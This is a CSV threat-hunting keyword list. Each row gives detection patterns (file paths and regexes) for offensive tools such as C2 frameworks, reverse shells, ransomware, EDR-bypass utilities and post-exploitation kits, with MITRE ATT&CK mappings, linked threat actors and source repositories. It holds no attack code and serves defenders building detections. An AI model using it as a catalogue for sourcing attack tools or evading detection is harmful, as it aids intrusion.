"*/helperFunctions/Getallregvalues.txt*",".{0,1000}\/helperFunctions\/Getallregvalues\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7758"
"*/helperFunctions/Getregvalue.txt*",".{0,1000}\/helperFunctions\/Getregvalue\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7759"
"*/helperFunctions/Setregvalue_hkcu.txt*",".{0,1000}\/helperFunctions\/Setregvalue_hkcu\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7760"
"*/Heroinn.git*",".{0,1000}\/Heroinn\.git.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","7761"
"*/Heroinn/*",".{0,1000}\/Heroinn\/.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","7762"
"*/heroinn_client/*",".{0,1000}\/heroinn_client\/.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#linux","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","7763"
"*/hid_inject.*",".{0,1000}\/hid_inject\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","7764"
"*/hid_sniff.*",".{0,1000}\/hid_sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","7765"
"*/HiddenDesktop.git*",".{0,1000}\/HiddenDesktop\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","7766"
"*/hidden-tear.exe*",".{0,1000}\/hidden\-tear\.exe.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","7767"
"*/hidden-tear.git*",".{0,1000}\/hidden\-tear\.git.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","7768"
"*/HiddenTear.zip*",".{0,1000}\/HiddenTear\.zip.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","7769"
"*/hidden-tear/write.php?info=*",".{0,1000}\/hidden\-tear\/write\.php\?info\=.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","7770"
"*/hidden-tear-remake.git*",".{0,1000}\/hidden\-tear\-remake\.git.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","7771"
"*/hijack_opener/*.js*",".{0,1000}\/hijack_opener\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","7772"
"*/hijack_opener/*.rb*",".{0,1000}\/hijack_opener\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","7773"
"*/HijackDLL-CreateRemoteThread.cpp*",".{0,1000}\/HijackDLL\-CreateRemoteThread\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","7774"
"*/HijackDll-Process.cpp*",".{0,1000}\/HijackDll\-Process\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","7775"
"*/HijackDLL-Threads.*",".{0,1000}\/HijackDLL\-Threads\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","7776"
"*/HijackHunter/*",".{0,1000}\/HijackHunter\/.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","7777"
"*/HInvoke.cs*",".{0,1000}\/HInvoke\.cs.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","7778"
"*/hiphp.git*",".{0,1000}\/hiphp\.git.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","7779"
"*/hiphp-cli.sh*",".{0,1000}\/hiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","7780"
"*/hiphp-desktop.sh*",".{0,1000}\/hiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","7781"
"*/hiphp-main*",".{0,1000}\/hiphp\-main.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","7782"
"*/HiveDump.ps1*",".{0,1000}\/HiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","7783"
"*/HiveDump.ps1*",".{0,1000}\s\/HiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#windows","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","7784"
"*/hnap-info.nse*",".{0,1000}\/hnap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7785"
"*/hoaxshell.git*",".{0,1000}\/hoaxshell\.git.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","7786"
"*/hoaxshell/*.py*",".{0,1000}\/hoaxshell\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","7787"
"*/holehe.git*",".{0,1000}\/holehe\.git.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","7788"
"*/hollow.x64.*",".{0,1000}\/hollow\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/HOLLOW","1","1","N/A","N/A","10","10","280","60","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z","7789"
"*/home/app/wstunnel*",".{0,1000}\/home\/app\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","7791"
"*/home/daddyShark/BabySh4rk/*",".{0,1000}\/home\/daddyShark\/BabySh4rk\/.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#linux","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","7793"
"*/home/kali*",".{0,1000}home\/kali\/Downloads.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","7794"
"*/home/lowpriv/*",".{0,1000}\/home\/lowpriv\/.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","7795"
"*/home/pyrdp/*",".{0,1000}\/home\/pyrdp\/.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","7796"
"*/home/sliver/*",".{0,1000}\/home\/sliver\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#linux","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","7797"
"*/home/tarcisio/teste*",".{0,1000}\/home\/tarcisio\/teste.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","N/A","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","7799"
"*/home/tor2web/*",".{0,1000}\/home\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","7800"
"*/hookchain_finder64.exe*",".{0,1000}\/hookchain_finder64\.exe.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","1","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","7802"
"*/HookChain_msg.exe*",".{0,1000}\/HookChain_msg\.exe.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","1","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","7803"
"*/HookDetector.exe*",".{0,1000}\/HookDetector\.exe.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","7804"
"*/hooks/spoof.c*",".{0,1000}\/hooks\/spoof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","7805"
"*/HookSentry.exe*",".{0,1000}\/HookSentry\.exe.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","0","1","N/A","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","7806"
"*/HookSentry.git*",".{0,1000}\/HookSentry\.git.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","1","1","N/A","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","7807"
"*/hop.php*",".{0,1000}\/hop\.php.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","7808"
"*/horizon3ai/*",".{0,1000}\/horizon3ai\/.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","N/A","Added to cover the POC exploitation used in  massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","7809"
"*/HostEnum.ps1*",".{0,1000}\/HostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7811"
"*/hostenum.py*",".{0,1000}\/hostenum\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda 